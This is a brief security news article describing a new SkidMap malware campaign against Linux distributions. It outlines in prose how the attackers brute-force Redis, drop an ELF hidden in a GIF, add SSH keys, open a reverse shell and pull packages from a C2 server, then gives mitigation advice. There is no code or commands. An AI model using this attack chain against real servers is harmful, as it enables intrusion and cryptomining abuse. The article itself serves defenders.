A new variant of the SkidMap malware is being used in a new campaign targeting a wide range of Linux distributions, including Alibaba, Anolis, openEuler, EulerOS, Steam, CentOS, RedHat, and Rock.
The malware, first spotted in September 2019 as a cryptocurrency mining botnet, has evolved to include malicious kernel modules to evade detection.
During the analysis, researchers at Trustwave found at least two Linux variants of the SkidMap malware that influenced the infection flow. The first variant was Debian/Ubuntu and the second variant was RedHat/CentOS.
Infection process
The attack chain begins with attackers logging into unsecured Redis instances via brute force attacks and setting up variables containing cron tasks under a base64 string.
- Once the poorly secured Redis server instances are breached, a dropper shell script is deployed to distribute an ELF binary hidden inside a GIF image file.
- The binary then adds SSH keys to the "/root/.ssh/authoried_keys" file to disable SELinux and establish a reverse shell to connect with the attacker-controlled server every 60 minutes.
- Based on the Linux distribution targeted and the kernel used, an appropriate package ( gold, stream, euler) is downloaded from the C2 server.
Linux machines are increasingly under attack
- Recently, an advanced rootkit called Reptile was reported targeting Linux systems in South Korea. The rootkit includes a reverse shell feature, enabling attackers to swiftly access targeted systems.
- Separately, the Chinese APT31 hacking group used a new Rekoobe backdoor malware to launch attacks against domestic companies via Linux systems.
Conclusion
In the event that a Linux system has been compromised, administrators should leverage IOCs shared by security researchers to eliminate malware and malicious scripts from systems. In this specific case, attackers are even leveraging unsecured Redis servers. To mitigate this, Redis introduced a security feature called ‘protection mode’, available from version 3.2.0 onwards. Besides, it is recommended to secure both Linux and Redis instances by setting a strong password and limiting network access to trusted clients only in a restricted network.
Publisher
/https://cyware-ent.s3.amazonaws.com/image_bank/f4d7_shutterstock_1242117157_2.jpg)
/https://cyware-ent.s3.amazonaws.com/image_bank/12ec_shutterstock_687323650.jpg)
